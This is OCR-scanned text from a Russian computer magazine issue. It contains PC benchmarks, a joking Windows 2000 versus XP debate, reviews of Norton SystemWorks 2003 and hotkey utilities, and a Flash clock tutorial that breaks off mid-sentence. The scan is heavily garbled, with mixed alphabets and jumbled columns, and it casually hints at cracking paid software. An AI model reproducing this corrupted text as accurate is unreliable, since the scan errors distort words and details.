рым результат показал системный блок от ISM. Приятно удивил и 
малыш Эксимер, доказав, что является хорошей покупкой для офиса. 


PC MARK 2002 


PCMark2002 активно использует разные методы для оценки произво- 
дительности PC, например такие как: декомпрессия JPEG, компрес- 
сия и декомпрессия по алгоритму 1.777, текстовый поиск и преобра- 
зование аудиопотока. С этими задачами опять быстрее всех справи- 
лись компы от Depo и ISM. Остальные системники идут довольно 
плотной групой, показывая схожие результаты. 


3D MARK 2001 


(1024x768 32bit color, z-buffer 24 bit) 

Этот самый популярный 3D-TecT должен показать насколько наши 
системные блоки готовы к испытаниям серьезными игрушками. И 
вот тут во всей красе проявил себя P4 Ready, что объясняется ис- 
пользованием крутой видеокарточки в недрах своего железного те- 


ла. Также, за счет более мощной видеокарты, хорошие результаты 


показал Арес Universal, опередив многих конкурентов. 


Quake 3 Team Arena 


B реальной игрушке, P4 Ready также был впереди всех конкурентов. Впро- 
чем, Арес Universal и Depo Race показали тоже весьма высокие результа- 
ты. Так что, геймерам следует ориентироваться именно на эту троицу. 


раде 083 


i 
‚38 2 вы = — 


NOYEMY? ПОЧЕМУ ЛЮБОЙ ЛИНУКСОИД HASYBOK ЗНАЕТ, ЧЕМ 
ЯДРО 2.2.X ОТЛИЧАЕТСЯ ОТ 2.4.Х, А СТАНДАРТНЫЙ 
ПОЛЬЗОВАТЕЛЬ ВИНДОВ НА ГЛАЗОК ЭЁВЫЕ ОТ ВИНТУКЕЯ НЕ 
отличит? Вот с этим ВОПРОСОМ ДРОНИЧ И ПРИСТАЛ К НАМ, 
ЗАДАВ ПАРУ НАВОДЯЩИХ ПОД ЭННОЕ КОЛИЧЕСТВО ПИВА. 
Никто и нЕ ПОДОЗРЕВАЛ, ЧТО ИЗ ЭТОГО ВЫРАСТЕТ 
СТРАШНЫЙ И СМЕРТЕЛЬНЫЙ BOM. 


От рефери: для начала я попросил наших за- 
щитников ввести публику в курс дела - откуда 
растут ноги (и чем они пахнут) у двух поколе- 
НИЙ ВИНДОВ. 


О: Начну я, на правах старшего. Ведь w2k 
старше ХР почти на два года. Так вот, мой лю- 
бимый винтукей пришел на смену семейству 
МТ (как оказалось позже - и на смену 9х тоже, 
т.к. Миллениум успешно провалился). Мало 
кто знает, что МТ - это new technology, новая 
технология в производстве осей. Фактически, 
именно в пятой версии (w2k = МТ 5.0, если кто 
забыл) разработчикам удалось нарастить на 
прочную основу NT4 человеческий интерфейс 
и нормальную поддержку железа. Ну и конеч- 
но, смена файловой системы Ha NTFS, гораз- 
до более правильную, чем FAT32. 


От рефери: не согласен, NTFS объективно не- 
многим лучше РАТов! А уж насколько тормоз- 
нутей... Ладно, в ближайшее время мы забаца- 
ем тест этих двух систем и посмотрим, кто прав. 


О: Я могу продолжить? :) Еще один весомый 
плюс винтукея - не очень критичные по финан- 
сам системные требования. На моем Дурне- 


СТАТИСТИКА ПО WINFORMATION: 

OPOHMY: WIN2ZK + WINXP (НУ OBA 
КОМПА :)) 

АлЕКСИС: WIN2K (КАК ЧЕСТНЫЙ 
ПАРАНСИК) 

Кирисн: WINXP (и TBMKAH ЕГО, 
TBMKAH) 

ильич: WINSS (и HE СМЕЙТЕСЬ, > 


МЕНЯ КОМП ОЧЕНЬ СТАРЫЙ) 


| | 
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650 она грузится довольно долго (болезнь 
всех НТей), зато работает более чем прилич- 
но. А когда я воткнул очередную линеечку па- 
мяти, то понял, то 98-е безнадежно сосут! Так 
что считай, что идеальная конфигурация - 
проц не ниже второго пня и 128+ мегов опера- 
тивы. В такой атмосфере жизнь будет практи- 
чеки райской. А что твои ХР? Тормозят же 
безбожно! 


ПП: А ну и что? Конфигурация компа у меня 
современная, а ориентироваться на старое 
железо я не собираюсь! У меня гигагерцовый 
аслон и 512 памяти - и даже при включении 
всех примочек и нового интерфейса летает 
покруче w2k! И вообще, если посмотреть на 
объем используемой памяти у ХР при «класси- 
ческом» интерфейсе, он будет не больше тво- 
его. А то и поменьше! Технологии-то другие, 
посовременнее! 


О: Но если не видно разницы, зачем платить 
больше? :) 


ПП: Ну, платить-то нам одинаково, чай не в 
штатах живем :). Тем более, что отключив но- 
вый интерфейс я не потеряю новых возмож- 
ностей. Как тебе, к примеру, антиалиасинг 
шрифтов? Для здоровья-то денег не жалко! 
Или иконки, которые можно запросто убрать с 
трея? А упорядоченные окна приложений? 


О: Это что еще за зверь? 


ПП: Когда окон одной проги открывается че- 
ресчур много, их можно объединить в одну 
(всего одну!) кнопочку на таскбаре. Тебе 
ведь знакомо чувство неопрделенности, ког- 
да окон эксплорера туча, а нужное найти не- 
просто? 


О: Незнакомо! Я Оперой пользуюсь :). И вооб- 
ще, украшалочки - это не главное. Главное - 
надежность. Вот в винтукее были внедрены 


офигенные фишки, которые мало кто исполь- 
зует. Например, динамические диски, или ЗЕС 
(ака System File Protection). Хотя ей-то как раз 
пользуются все, сами того не понимая :). 


От рефери: расскажи поподробней, не всем 
известно про эту байду. 


в Ja, non амое темечко :| да и; 
швырнусь запасенным булыжничком - 4 
=— № Bac там за беда с Prodi 4 Activation? Говорят, | 
| ХР сервиспаков не признает? Не стремно ‹ 
ПП: Ану и что? Вообще, это не проблема для 
— лицензионных виндов, они апгрейдятся но 
Пес Паштет - пухл, добродушен и злораден мально. А вот пиратские... Конечно, приходит- Qysta - худощав, вечно озабочен 
одновременно, любит ХР до потери сознания| с ora потрахаться, но в целом ничего проблемой быстродействия, использует 
(причем каждый вечер), настоящий юзер i = - : | винтукей из-за нежелания апгрейда, 
| без потугов к оптимизации. | чем вполне доволен. 
Это DLL-hell неизвестно? Ладн 0- | страшн Эткрой прошлый номер спеца и 
М J | NOM! = AT | Г 
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WINformation 


Казарьян Карен aka Kirion (kirion@winfo.org) 


рис. Наталья Копылова 


«KIRION СМОТРЕЛ В МОНИТОР НА РЕЗУЛЬТАТЫ ГОЛОСОВАНИЯ 


«НРАВИТСЯ ЛИ ТЕБЕ РУБРИКА WINFORMATION». 


B roAoBE 


КРУТИЛИСЬ ФИНАЛЬНЫЕ КАДРЫ ИЗ «ДЖЕЯ И МОЛЧАЛИВОГО 
БОБА». ГЛУБОКО ВЗДОХНУВ И ОТБРОСИВ КРОВОЖАДНЫЕ 
мысли, KUMP ПОДУМАЛ: «НЕ ТАК ПЛОХО, ШЕСТДЕСЯТ 
ПРОЦЕНТОВ ВСЕ ЖЕ НАШИ :)». OH ПЕРЕВЕЛ ВЗГЛЯД НА ПОЛКУ 
С ДИСКАМИ: СВЕРХУ КРАСОВАЛАСЬ КОРОБОЧКА С НАДПИСЬНЭ 
NORTON SYSTEMWORKS 2003. EWE РАЗ ВЗДОХНУВ, OH 
ЗАПУСТИЛ ВОРД И НАЧАЛ ПЕЧАТАТЬ...». ВСЕ ТЕЧЕТ, BCE 


ИЗМЕНЯЕТСЯ... 


BOT и SYMANTEC ВЫПУСТИЛА НОВЫЕ NORTON 


SYSTEMWORKS ПОД НОМЕРОМ 200383. Y ТЕБЯ ВЕДЬ СТОЯЛА 
ПРЕДЫДУЩАЯ ВЕРСИЯ? ЧТО ЗНАЧИТ, В ПЕРВЫЙ РАЗ СЛЫШУ?. 
А НУ БЫСТРО БЕГИ ЗА СЕНТЯБРЬСКИМ НОМЕРОМ И ЧИТАЙ 
СРАВНИТЕЛЬНЫЙ ОБЗОР НАСТРОЙЩИКОВ - ГИГАНТОВ :). A, TAK 
Ты ВСЕ-ТАКИ С НИХ СЛЫШАЛ... ТОГДА САДИСЬ ПОУДОБНЕЕ: 
БУДЕМ ОЦЕНИВАТЬ НОВУНЗ ВЕРСИН-З. 


УСТЯНОРНН 
Пользователи XP, возрадуйтесь. Теперь NSW 
без проблем встанет на вашу систему. Но мас- 
тер оптимизации, создание снимков диска, 
сравнение файлов, и редактор реестра все рав- 
но остались недоступны :(. Недоступно также 
создание Rescue Disk (хотя можно создать 
emergency диски, но это средство слабее, так 
как не содержит таких полезных вещей, как ко- 
nua partition table, например). Почему так - боль- 
шая для меня загадка. Зато в поставку вклю- 
чен антивирус, CleanSweep (о нем чуть позже), 
Go Back personal edition (прога для создания то- 
чек восстановления) и еще кое-какая мелочь. 


По поводу Go back: ходят споры - ставить или 
не ставить подобные программы. С одной сто- 
роны, ты уверен, что если у тебя упадет систе- 
ма, то ты всегда сможешь восстановить рабо- 
тоспособность компа. С другой - эти проги жрут 
много места на диске и достаточно системных 
ресурсов. Вообще решай сам, надо оно тебе 
или нет, могу только отметить, что Go back од- 
на из лучших прог в своем классе (особенно 
professional версия, поставляемая отдельно). 

Из поставки убрали Process Viewer, но если те- 
бе полюбилась эта маленькая и удобная про- 
грамма, ты всегда можешь слить ее с 
Www.prcview.com. Кстати, советую залезть в 
диру manual и почитать доки - толковые зерна 


в них есть. A еще залезть в зирро\\е К - co- 
здание загрузочных дискет, и Support\symclean - 
удаление всех следов программ oT Symantec из 
системы. Надеюсь, до такого у тебя не дойдет 
:). Ну что, все установил? Начинаем тестить... 


НЯНИ ДЕСЯТЬ 
OTNAHYHH 
Сразу бросается в глаза новый дизайн обо- 
лочки. По-моему, она стала удобнее, не поте- 
PAB в красоте и функциональности. У One but- 


ton checkup появилась возможность выбрать 
нужные проверки самостоятельно. Опции раз- 
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биты по закладкам, равно как и помощь. Но 
это все приятные мелочи, а что же с самими 
утилитами? Утилиты из блока Norton Utilites 
практически не изменились. Speed disk все Tak 
же быстр и эффективен (хотя... VoptXP мне 
все же нравится больше). WinDoctor отлично 
чинит систему, a Disk doctor по-прежнему кру- 
че скандиска. System doctor все еще отличный 
монитор всего, чего только можно, а Wipe info 
с радостью сотрет все ваши данные в поро- 
шок, даже те, что защищает Norton Unerase :). 
Далее по списку у нас Norton Antivirus. He сов- 
сем мой профиль - писать про антивирусы, но 
несколько хвалебных строк черкануть можно. 
Проплачено Symantec :). Как обычно нам обе- 
щают наилучшую защиту от вирусов, опасных 
скриптов, и почтовых червей. Антивирус уме- 
ет сканировать входящую и исходящую почту, 
отправляемые и получаемые файлы в таких 
программах, как AOL messenger, MSN messen- 
ger и Yahoo messenger. Странно, почему не в 
ICQ? В опциях можно включить плагин для MS 
Office, который будет сканировать документы 
при открытии (довольно быстро, даже в боль- 
ших документах). Если что не так - всегда 
можно посмотреть логи в закладке Reports, 
просто и понятно. Ну и самое главное - антиви- 
рус остался таким же быстрым (не в пример 
тому же AVP), а памяти стал съедать намного 
меньше своей предыдущей версии. Короче го- 
воря, рекомендую всем. А особенно тем, кто, 
как и я не любит отечественного производите- 
ля (нифига себе! А мой ДрВеб, победивший на 
всемирном конкурсе антивирей типа вообще 
не котируется? Придется замутить тест анти- 
вирусов - прим. Дронича). 

Далее по списку у нас обновленный Norton 
CleanSweep. Видимо в Symantec всерьез pe- 


ТАК ЧТО ПОСТАВИТЬ NSW2003 

ВСЕ-ТАКИ COBETY#HI - МОЖЕТ Я ЧЕГО 
ПРОГЛЯДЕЛ, ВСЕ ПОСТАВЯТ И БУДУТ 
ГОВОРИТЬ: «KIRION - ЛАМЕР, ТАКУНЗ 


РУЛЬНУНЗ ФИШКУ ПРОПУСТИЛ :)». 


шили довести до ума этот продукт, ведь пре- 
дыдущая версия этого чистильщика системы 
была довольно бестолковой. Что же он пред- 
ставляет собой сейчас? А представляет он 
несколько визардов, разделенных Ha три час- 
ти. CleanUp: здесь представлены Uninstall 
wizard и Fast&Safe cleanup. Fast&Safe cleanup 
- обычная чистилка мусора (System mechanic 
намного лучше). Uninstall wizard - удаляет 
программы вместе со всеми хвостами. В раз- 
деле Internet представлены 5 визардов удаля- 
ющих различный интернет-мусор: кэш, куки- 
сы, плагины и элементы ActiveX. Ну и скачан- 
ные программы до кучи. В оставшемся разде- 
ле Programs находятся Backup wizard - coxpa- 
няет все файлы программы, ключи реестра, 


В НОВЫЙ ГОД С НОВЫМ НОРТОНОМ 


библиотеки и.т.д. в архив для того, чтобы по- 
том восстановить их с помощью Restore wiz- 
ard. Однако 100% гарантия восстановления 
дается только если процесс установки проги 
мониторился CleanSweep’om. То же самое 
можно сказать и про Уп! а! wizard, бывает и 
он оставляет некоторые хвосты программ 
незамеченными. Конечно, ты всегда можешь 
посмотреть состав архива и добавить туда 
необходимые вещи ручками, но если хочешь 
действительно эффективной работы проги - 
включи в опциях слежение за установкой. По 
идее в CleanSweep можно было включить и 
Web Cleanup из раздела Web Tools. В обыч- 
ном виде эта утилита повторяет функции 
CleanSweep - чистит интернет мусор. А вот 


если зайти в Advanced Cleanup, то откроется 
окошко с сортировкой по дате или узлу, где 
можно самому посмотреть разобранные по 
группам куки, кэшированные изображения, 
страницы и скрипты. Удобно, ведь иногда бы- 
вает надо перелопатить хистори в поисках 
чего-нибудь важного, и такая сортировка мо- 
жет сильно помочь. Ну и там же находится 
бестолковая Connection keep alive. Занимает- 
ся тем, что периодически пингует указанные 
серваки, симулируя тем самым сетевую ак- 
тивность, чтобы тебя не отключили. Это ци- 
тата из мануала, по-моему, звучит бредово. 
Неужели у них там такие провайдеры? Хотя я 
уже давно сижу на выделенке (хе-хе), может 
чего и не знаю. 


НОРОПЬ УМЕР - A 
A OPABCTBYET НОРОПЬ? 


Вот такой получился пакет. Подновили ди- 
зайн, добавили фишек. Все работает ста- 
бильно и быстро. Только вот изменения кос- 
нулись антивируса (это конечно хорошо, но я 
не о них пишу) и CleanSweep (который обла- 
дает несколькими интересными фишками, 
но, как чистильщик, проигрывает многим дру- 
rum прогам). Сами же Norton Utilites He изме- 
нились. Опять непонятное обрезание версии 
для ХР, те же недоработки что и в 2002 вер- 
сии. Если раньше NU были исключительно 
полезны для поддержания системы в поряд- 
ке, то теперь я могу назвать несколько про- 
грамм, которые выполняют по одной функ- 
ции, но делают их лучше. Но 2003 версию я 
себе все равно поставил. Привык я, знаете 
ли. Тем более что у конкурентов все не очень 
хорошо (Ontrack больше не поддерживает 
Fix-It - права переданы V-Com, а новые вер- 
сии МсаНе пираты, похоже, игнорируют). Так 


что поставить NSW2003 все-таки советую - 
может я чего проглядел, все поставят и бу- 
дут говорить: «Ктоп - ламер, такую рульную 
фишку пропустил :)». Так что беги на рынок 
за диском, да побыстрее. А то рождество, но- 
вый год, опять рождество, опять новый год :). 
И не проспи новогодний спец. Веселых празд- 
ников! «Праздники, будут им праздники. 
Kirion оторвался от компа и подошел к книж- 
ному шкафу. Порывшись в глубине полок, он 
достал замусоленный томик и углубился в 
чтение. Обложка гласила: «Поваренная кни- 
га анархиста»...» 
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ABH HA НА+ДЫН ДЕНЬ 


ПРЕДСТАВЬ, Ты СИДИШЬ ЗА КОМПОМ. ПРАВАЯ РУКА ЛЕНИВО 
ТАСКАЕТ МЫШЬ ИЗ СТОРОНЫ В СТОРОНУ, ЧТОБЫ В СОТЫЙ РАЗ 
ОТКРЫТЬ КАКУНЗ-НИБУДЬ MEHHOWKY, ЗАПУСТИТЬ ПРОГУ ИЛИ 
ЕЩЕ ЧТО-НИБУДЬ. А ГДЕ ТВОЯ ЛЕВАЯ РУКА BO ВРЕМЯ РАБОТЫ? 
СЛУЧАЙ С ВЕСЕЛЫМИ САЙТАМИ ОПУСТИМ :). А ДОЛЖНА ОНА 
БЫТЬ НА КЛАВИАТУРЕ. ВЕДЬ СТОЛЬКО ОПЕРАЦИЙ МОЖНО 
СДЕЛАТЬ, НЕ ПРИБЕГАЯ К МЬШИ, А С ПОМОЩЬЮ ГОРЯЧИХ 


КЛАВИШ. 


Почти BCE НАВОРОЧЕННЫЕ ПРОГИ ИМЕНТ НАБОРЫ 


XOTKEEB ДЛЯ ОБЛЕГЧЕНИЯ РАБОТЫ. Ты ПОПРОБУЙ 
ПОРАБОТАТЬ В ДЕЛЬФИ ИЛИ POTOWONE одной мышью - 


ПРОЩЕ СРАЗУ ПОВЕСИТЬСЯ. 


И УПРАВЛЯТЬ ВИНАМПОМ С ИХ 


пОмощЬьн УДОБНЕЕ. ТОЛЬКО ВОТ БЕДА - НЕ ВСЕГДА BbIBAHIT 
НУЖНЫЕ XOTKEM. Ты ХОЧЕШЬ, ЧТОБЫ ТВОЯ КЛАВА РАБОТАЛА 
НА ВСЕ СТО ПРОЦЕНТОВ? ТОГДА МИЛОСТИ ПРОСИМ, СЕГОДНЯ 
мы тЕСТИРУЕМ ПРОГИ-УСТАНОВЩИКИ ГОРЯЧИХ КЛАВИШ. 


5ТНЕТЕНЕ 


www.yuram24.narod.ru 


Начнем с самой простенькой проги в нашем 
обзоре. Абсолютно любительское творение, 
впрочем, автор этого и не скрывает. 
Единственное, что умеет программа - это 
запускать заданные программы по нажатию 
горячих клавиш. Проги можно разделить на 
группы. А еще тулза умеет обрабатывать 
досовские батники. В принципе, такую 
софтину легко написать на Дельфи, но 
писалось явно не на нем - прога весит чуть 
больше мега. Собственно под наши задачи 
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она не подходит совсем, HO часто 
присутствует на серваках бесплатного 
софта. Если увидишь - не качай :). 


HOTKEYCOMTROLHP 


(www.digital-miner.com) 


Последнее время стало модно среди 
производителей софта прикручивать буквы 
ХР к названию своих продуктов. Типа мы все 
такие продвинутые. Меня лично от ХР-стиля 
уже начинает тошнить. Вот и еще одни 
программеры добавили в прогу иконки из ХР 
и приписали две буковки к своему творению. 


На что же способна сама прога? Мы умеем 
работать со звуком (громче, тише, выклю- 
чить); открывать файлы (только 8 - маловато 
будет!); выключать, перезагружать, менять 
пользователя на компе; открывать, закры- 
вать и проигрывать СО. Умеет управлять ок- 
нами и браузером, переназначать системные 
комбинации (разработчики не гарантируют 
совместимость). Все действия сопровожда- 
ются подсказками в углу экрана или на 
иконке в таскбаре (можно отрубить). Из 
интересных особенностей проги: можно 
настроить так, чтобы хоткеи срабатывали 
только при определенном состоянии пит, 
caps и scroll lock кнопок. Например: включен у 


A ГДЕ ТВОЯ ЛЕВАЯ РУКА BO ВРЕМЯ 
РАБОТЫ? СЛУЧАЙ С ВЕСЕЛЫМИ 


САЙТАМИ ОПУСТИМ :). 


тебя scroll lock - по хоткею комп перегру- 
жается, а выключен - комп выключается. К 
сожалению, больше никаких достоинств 
прога не имеет. Чуть не забыл - она 
бесплатная (наверное, единственный плюс). 


НОТ REYBORRD PRO 


оофоооооофосоооо 


www.hot-keyboard.com 


Hy вот это уже что-то посерьезнее. Кроме 
управления звуком и сидюком, прога 
довольно неплохо управляет окнами, умеет 
вставлять определенный текст, 

выполняет автозамены указанных слов в 
любом окне ввода, может создавать менюшки, 
вылезающие по нажатию хоткеев, открывать 
определенные директории (угадай как - 
правильно, по нажатию клавиш :)). Ну и, 
конечно, умеет запускать проги и открывать 
определенные адреса в инете. Hy а еще - 
записывать комбинации клавиш и назначать на 
них более короткий хоткей. В качестве примера 
показывается удаление строки по ctrl+y. Так что 
ты легко можешь создавать собственные 
макросы, но свобода действий тут небольшая :(. 
К плюсам проги можно отнести возможность 
запускать макросы в определенное время. Я, 
правда, не очень себе представляю, зачем это 
может понадобиться, ну да ладно. В целом - все 
равно слабенько, особенно по сравнению со 
следующими продуктами. 


KEYRA 


хооооооховохосо 


www.vp-soft.com 


Первый (и последний) не бесплатный продукт в 
нашем обзоре. Что же она умеет? В принципе, 
все стандартно: управление звуком, управление 
СиДи, управление окнами (слабенько, умеет 
только сворачивать окна и переводить их на 
передний план aka always on top). Умеет 
запускать проги, открывать определенные 
адреса в инете, писать письма на определенные 
мыльники. Умеет управлять самим собой 
(выключить, например, или подключить 
плагин). Очень прикольная особенность - умеет 
посылать указанным окнам  виндовые 


сообщения (только вот сообщение придется 
писать самим, выбора тут нет). Как и 
предыдущая прога, умеет записывать длинные 
последовательности клавиш и вешать из на 
короткий хоткей, но Кеутап будет посылать их 
только определенному окну. Естественно, 
Кеутап умеет выключать и перезагружать 


компьютер, умеет 
даже выключать 
монитор. Но самая 
рульная особенность 
Keyman - для него 
есть плагины, 
которые расширяют 
возможности проги. 
Так в поставке идет 
плагин по управлению 
Винампом. Сказать 
что это не удобно - 
соврать самому себе. 
Представь, Винамп 
все равно ведь висит 
на фоне, когда ты 
делаешь другую работу. Теперь тебе не надо 
делать окно Винампа активным - достаточно 
нажать на хоткей, чтобы поставить паузу или 
пролистать треки. С сайта можно скачать 
плагин для всякого рода теззепдегов, среди 
них и Аська. Если ты часто пользуешься 
подобными прогами (а я уверен - часто), ты 
оценишь этот плагин. Вот такая вот прога, жаль 
только не халявная :(. Но это должно лечиться 
на Асте. 


HOTKEY HOST 


(www.savara.time-out.ru) 


Это прога понравилась мне больше всего. 
Хочешь, объясню почему? Она маленькая. Она 
ненавязчивая - никогда ничего не выводит на 
экран. Для нее можно самому писать 
библиотеки-плагины (с сайта можно скачать 
среду разработки), причем на моих любимых 
Дельфях. Ну и, наконец - Hotkey Host наголову 
превосходит по возможностям и настройкам 
конкурентов. Так он умеет не только запускать 


КЛАВА В ОГНЕ 


проги, но и открывать файлы или печатать их. 
Умеет выводить стандартные окна сообщений. 
Умеет переключать пользователей в МТ, 
переводить систему в состояния Зизрепа и 
Hibernate. Hotkey Host умеет двигать мышь, 
отлично управляется с окнами. Кстати, есть 
возможность прописать действия не только на 
нажатия клавиш (aka keypress) но и отдельно 
на нажатие и отпускание (aka keydown и 
keyup). Согласись, это позволяет сильно 
разнообразить макросы. Вместе с программой 
поставляется несколько базовых библиотек. 
Среди них - работа с Winamp, Apollo (знаешь 
такой плеер?) и The Playa. Причем функции 
управления тем же Винампом выходят за 
рамки обычных стоп, пауза, звук. Хочешь 
поподробнее узнать - залез в мануал. Кстати, 
залезь туда в любом случае, ибо у проги есть 
один маленький минус. У нее нет графического 
конфигуратора. Его обещают сделать как- 
нибудь потом, а пока - тебе придется ручками 
править файл конфигурации. К счастью, это не 
сложно, благо файл строится на XML- 
формате. Если тебя не пугают эти трудности - 
смело ставь прогу, не пожалеешь. 


HAtKIMH HA RHOMRY - 
ПОПУЧЫШЬ РЕЗУПЬТЯТ 


ооофооо ооо ооооо 


Странно. 4 из пяти прог в сегодняшнем 
обзоре написаны с участием русских 
программеров. А между прочим, прог такого 
класса совсем немного. Получается, что 
только наши ребята достаточно продвинуты 
для того, чтобы юзать хоткеи :). И если ты 
готов влиться в их ряды - качай себе Hotkey 
Host, причем вместе с SDK (software develop- 
ment kit, если кто не знает). Как напишешь 
толковый плагин - выложи в сеть, покажи 
разработчикам, ну и мне конечно :). И 
тренируй левую руку. 
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ilich (ilich@winfo.org) 


Е ЧАСОВ... ННЫПЮДНЮТ! 


— 
Lis JS See ж = 2 м в ма 


Я ТАК ПОЛАГАНЗ, ТЫ УЖЕ ЗАВАЛИЛ НАПРОЧЬ СВОЙ РАБОЧИЙ 
стол всякими рРАЗНЫМИ НАКЛЕЙКАМИ, МЕННОШКАМИ С 
^ЮБИМЫМИ YPAAMM М МЫЛЬНИКАМИ. ДА ВОТ ТОЛЬКО MPO TO, 
что FLASH МОЖЕТ ОЧЕНЬ ДАЖЕ ПРОДУКТИВНО РАБОТАТЬ СО 
ВРЕМЕНЕМ, ТЫ СОВСЕМ ЗАБЫЛ. А Я ВЕДЬ ГОВОРИЛ ОБ ЭТОМ! 
НО, ПРАВДА, ЭТО НЕ УДИВИТЕЛЬНО, ТЫ, ВЕРОЯТНО, ДО СИХ 
ПОР, УЖЕ ЦЕЛЫЙ ДОЛБАННЫЙ МЕСЯЦ, УСЕРДНО КЛИКАЕШЬ ПО 
NMUAMNE «NEw STICKER» :). 


НОГО УРОДУЕТ? 


Давай налепим тебе на Рабочий инструмент 
:) некое подобие часов. Я знаю, о чем ты по- 
думал. Так вот ты не прав, мы будем рисо- 
вать во Flash’e аналоговый времяисчисляю- 
щий прибор (ну то есть часы) и опосля поме- 
стим его у тебя на (нет, не там!) экране. 

Для начала, надо определиться, как будут 
выглядеть наши часики. И это, между про- 
чим, не просто так делается. Это вопрос 
имиджа. Он требует к себе особого внима- 
ния и серьезности. Новый год грядет. В 
связи с этим мы, как парни исключительно 
скромные, ограничимся, пожалуй, крем- 
левскими курантами на Рабочем столе. 
Прикинь, как будут оргазмировать все пар- 


ни и девчонки, когда на тусе у тебя дома в 
двенадцать часов ночи между днем Х и 
днем Х+1 дуэтом с телеком твой комп нач- 
нет бешено бомбить по-курантски :). Осо- 
бенно брызгать будут те, кто сумел про- 
биться сквозь толпу у твоего монитора, 
ибо они будут лицезреть на нем и сам 
Кремль. Не искажай лицо, не веруя мне, 
все так и будет. 

Чтобы все получилось пинцетно, тебе надо 
поиметь где-нибудь картинку, изображаю- 
щую объект, чем-то похожий на Кремль. 
Ты и сам в курсе, что в инете есть все, при- 
чем по много раз (например, 
http://www.phot.ru/FotoBank/foto- 
bank3/309.php или hitp://photo.bynet.ru/ 
cards/red3.shtm). Ho лично я люблю тя- 


Чесетбег/ 12/2002 


нуть Муму за... сам знаешь что. Я взял, да 
нарисовал. 

И тебе советую. Конечно, в этом есть свои 
минусы, связанные в большинстве своем с 
геморроем рисования и лишь отдаленной 
схожестью изображения с реальным объек- 
том (для особо одаренных художников :)). 
Но зато это наиболее простой способ до- 
биться четкого понятного изображения с 
доступными для флешевской анимации и 
кодификации частями этого изображения. А 
переделывать растр в вектор посредством 
Trace Bitmap придумали, по-моему, те са- 
мые долбанутые гомосапиенсы, которым по 
фигу, круглый квадрат или треугольный :). 
Я надеюсь, ты к ним не относишься и возь- 
мешься за рисование. 


РНСОВАННЫН КРЕМПЬ 


оооооо ово ооо ооо 


Не спеши размахивать мышкой и гордо вы- 
крикивать при этом, что «художник» - твое 
второе отчество. Перед непосредственным 
рисованием надо задать флешке необходи- 
мые габариты. Замечу, что она займет у те- 
бя весь экран и, соответственно, неплохо 
было бы сделать ее такого же размера (так 
удобнее рисовать) или хотя бы тех же про- 
порций. 

Начнем с одного из важнейших, на мой 
взгляд, элементов дизайна Кремля - звез- 
ды. Не смотря на свое наивысшее положе- 
ние, а, может быть, даже именно благодаря 
этому, эта часть сего сооружения наименее 
заметена. Мы это исправим. Звезда будет 
занимать чуть ли не ключевую позицию в 
нашей флешке. 

Итак, рисование. 
Как известно, 
кремлевская звез- 
да красная :). Еще 
известно, что в 
плане геометрии 
она пятиконечная 
и, надо полагать, 
не плоская. Хо- 
чешь сделать ее 
красивой - порабо- 
тай с градиентом 
ее заливки и при- 
дай ей объем. Сле- 
дует сделать звез- 
ду символом гра- 
фики «G - Star», 
т.к. пихать мы ее 
будем во много 
мест. Учитывая 
особенности ее 
симметрии, лучше 
всего центр симво- 
ла разместить в центре самой звезды. Далее 
создай символ кнопки «В - StarButton». В пер- 
вый, третий и четвертый кадры засовывай 
свой красный пятиконечный шедевр, а для 
второго мы немного над звездой поглумимся. 
Как ты помнишь, красиво выглядит, когда 
кнопка при наведении мышки каким-либо об- 
разом становится активной. Клоню к тому, 
что надо создать еще небольшой мувик («С - 
StarMove») для этого состояния кнопки и за- 
сунуть его в ее второй кадр. Так вот в этом 
«С - StarMove» делай пять одинаковых клю- 
чевых кадров, в которых графический сим- 
вол звезды стоит ровно по центру. Выделяй 
эти кадры, дави на них правой кнопкой мыши 
и в выпавшем меню выбирай «Create Motion 
Tween». Во втором кадре выдели символ пя- 
тиконечной и поверни его на девяносто гра- 
дусов (если ты не в курсе, для этого удобнее 
всего использовать панель Transform). В тре- 
тьем его же поверни на сто восемьдесят гра- 
дусов. В четвертом - на двести семьдесят. В 
пятом - ни хрена со звездой не делай. По- 
ставь для пятого кадра: «gotoAndPlay(1)». 
Раздвинь эти кадры по временной шкале так, 
чтобы между ними были равные промежутки. 
Теперь посмотри и осознай, что ты сделал. В 
этом мувике, а, следовательно, в кнопке «В - 
StarButton» при наведении на нее мыши, твоя 
звезда теперь будет вечно крутиться. 
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Ну что ж, далее, используя уже готовую 
кнопочку звезды, надо нарисовать верхнюю 
часть сооружения, ограниченную снизу ка- 
кой-нибудь горизонтальной линией. Лучше 
всего остановиться непосредственно на 
крыше, т.е. на зеленом конусе (если ты 
взялся рисовать Кремль только с моих слов 
без какого-то ни было точного его изобра- 
жения, то можешь сразу забыть о той тол- 
пе народа у твоего монитора, о которой я 
тебе говорил в начале, ибо особой точнос- 
тью и похожестью на оригинал это творе- 
ние вряд ли будет отличаться). Сделаем 
для этого новый символ «С - Roof». В пер- 
вом кадре мувика рисуй крышу и вставляй 
на самый верх нашу кнопочку звезды. Для 
этой кнопочки пиши: 

on (press) { 

у _root.gotoAndStop (1); 


На основной временной шкале действие пе- 
ренесется в первый кадр и на нем и остано- 
вится. Полученное изображение надо вы- 
ровнять так, чтобы центр мувика был точно 
в середине нижней стороны треугольника 
крыши. Первый кадр мувика «С - Roof» ско- 
пируй еще в четыре. Выдели эти последние 
кадры (без первого!) и соверши над ними 
«Create Motion Tween». В первом и послед- 
нем из них, используя «Скос» («Skew») пане- 
ли Transform, наклони крышу на 10 влево. Bo 
втором и третьем - на 10 вправо. Используй 
первый вариант скоса - тот, что скашивает 
по горизонтали. Для скоса влево надо ввес- 
ти отрицательное значение степени скоса. 
Когда вдоволь поиздеваешься над бедной 
крышей, обрати внимание на то, что центр 
мувика получился не там, где нам это надо, 
т.е. не в середине нижней стороны. Исправь 
это. Точнее всего это можно сделать при за- 
дании конкретных координат в той самой па- 
нели Transform. После выравнивания раз- 
двинь ключевые кадры с перекошенной кры- 
шей так, чтобы второй из них оказался вось- 
мым, третий - девятым, четвертый - пятнад- 
цатым. Теперь добавляй слой для 
ActionScript и в нем в первом, восьмом и пят- 
надцатом кадрах вставляй stop(). Получи- 
лось так, что мувик останавливается у нас 
на трех ключевых положениях крыши: пря- 
мо, наклонена вправо и наклонена влево. 
Глотни пивка, парень, и сосредоточься :). 
Это была лишь затравка. Основная часть 
рисования впереди. Надо создать символ 
клипа «С - Kremlin» и дорисовать в нем баш- 
ню (ну и все к ней прилагающееся). Самое 
главное в ней для нас - это ее будильник, 
т.е. куранты. Но не упирайся на этом, т.к. 
народ, мне кажется, не особо оценит Рабо- 
чий стол с одними часами, пусть даже не 
